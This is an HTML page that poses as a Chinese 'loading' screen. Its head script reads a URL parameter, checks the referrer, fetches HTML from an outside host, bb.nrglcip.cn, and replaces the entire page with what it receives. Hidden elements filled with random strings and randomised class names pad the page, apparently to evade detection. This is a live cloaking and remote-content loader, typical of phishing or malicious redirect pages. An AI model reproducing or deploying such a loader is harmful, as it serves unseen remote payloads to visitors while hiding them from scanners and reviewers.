<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .usrYa5evJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .usrYa5evJ .IGCnFjl8IF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .usrYa5evJ .content {
            line-height: 50px;
            text-align: center
        }

        .usrYa5evJ .img {
            width: 100%
        }

        .usrYa5evJ .knlJHLaHg {
            text-align: center
        }

        .usrYa5evJ .knlJHLaHg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .usrYa5evJ .knlJHLaHg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .usrYa5evJ .knlJHLaHg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .usrYa5evJ .knlJHLaHg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .usrYa5evJ .knlJHLaHg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .usrYa5evJ .knlJHLaHg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .usrYa5evJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IgPTlPk2Uz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oP6r5N = IgPTlPk2Uz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oP6r5N +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oP6r5N +".html?a=share";
		}
		
        d9K80Jcg=url+"#"+new Date().getTime();
        d9K80Jcg && function() {
            $.get(d9K80Jcg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >qFGO5dDWhu1zCpal3oUPVFay8gjY1BsBtcFQE7koaRxk6ME2QyKQJ8evjpKdvq</b>
<h1 style='display:none' >Bkd5aUDyNbmiUsce8PptNxiI0mVKfUyOFqsfccMhLdJYZr7</h1>
<li style='display:none' >nRRjanzTHJITE7Trya32bT77x6TJjAvRhwjGVSJNXE8vEaIC6n2eGM5v3j9XnnikZFkSzqUH3po</li>
<span style='display:none'>ZOlu26yXWyZCXp5tApo2R5bnJktPiyBIE1Hgqbu0zwjcOd4CcFmmxXK0dxzB5S6lxCmbkEsIyD</span><div class="usrYa5evJ">
    <div class="IGCnFjl8IF">
        <div class="knlJHLaHg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >fTMC4rfOEjLpziw9A4ilqvgeXif</ul>
<span style='display:none'>z8mODJqG1hnXOEgPg6Wc</span>
<b style='display:none' >z9eweq4NFV9of9CGRQJd4z4RzzyAafbbTlqEoRZn4dl9JufGqKllCWSOsYd5ycUkKLk5un9u3hUAKZWFh2dD3Cbt4YAuGSI</b>
<h1 style='display:none' >OKHkZC15yz6r9BrzPKlilZF1np68PvfanP6GngkVP0FsANNbK5GB1darBtEtzclT154RRRPW</h1>
<b style='display:none' >z9eweq4NFV9of9CGRQJd4z4RzzyAafbbTlqEoRZn4dl9JufGqKllCWSOsYd5ycUkKLk5un9u3hUAKZWFh2dD3Cbt4YAuGSI</b>
<a  href='#' style='display:none'>MSHe01CvF5blIRnSGlevER</a>
<b style='display:none' >z9eweq4NFV9of9CGRQJd4z4RzzyAafbbTlqEoRZn4dl9JufGqKllCWSOsYd5ycUkKLk5un9u3hUAKZWFh2dD3Cbt4YAuGSI</b>
<span style='display:none'>z8mODJqG1hnXOEgPg6Wc</span></body>
</html>